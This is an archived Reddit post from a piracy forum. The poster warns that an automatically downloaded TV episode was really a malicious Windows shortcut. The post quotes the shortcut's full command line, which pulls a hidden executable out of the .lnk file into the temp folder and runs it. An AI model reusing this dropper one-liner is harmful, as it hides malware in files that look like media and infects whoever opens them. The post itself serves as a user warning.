I recently had my sonarr setup download a tv show, and it turned out it was a ~1GB file, looked like it should at first glance - but it was... a shortcut to system32, running a command to create a .exe file and possible do all sorts of shit. Stay safe and keep your eyes open!
old.reddit.com
The file was a VLC icon(unsure if this is because i have vlc installed), with a little arrow, which indicates it was a shortcut. I initially just...
This is an automated archive made by the Lemmit Bot.

The original was posted on /r/piracy by /u/FortyAndFat on 2024-10-15 14:57:20+00:00.

Original Title: I recently had my sonarr setup download a tv show, and it turned out it was a ~1GB file, looked like it should at first glance - but it was… a shortcut to system32, running a command to create a .exe file and possible do all sorts of shit. Stay safe and keep your eyes open!

The file was a VLC icon(unsure if this is because i have vlc installed), with a little arrow, which indicates it was a shortcut. I initially just checked the folder because i usually see the new episode inside plex but there was nothing.

In qbtorrents initial downloads folder, it was sitting… looking like any other file. If i had opened it up from within qBitTorrent i wouldnt have found out…

The shortcut was to:

%comspec% /v:On/CSET urwUMg=Agatha.All.Along.S01E05.1080p.WEB.H264-SuccessfulCrab.mkv&(If not exist "%TMP%!urwUMg!.exe" findstr/v "comspec C8hPlRbD5" !urwUMg!.Lnk>"%TMP%!urwUMg!.exe")&CD %TMP%&TYPE nul>!urwUMg!&START "!urwUMg!" !urwUMg!.exe -PaYHMST4rLm

Note that you shouldn’t run this.

It should run a command prompt and check for, or create a .exe file which… could do all sorts of bad things.

Anyways, just wanted to share, so others can avoid ending up in this trap.

if anyone got some more info, or how to avoid this happening in the future, please share.

Stay safe while sailing!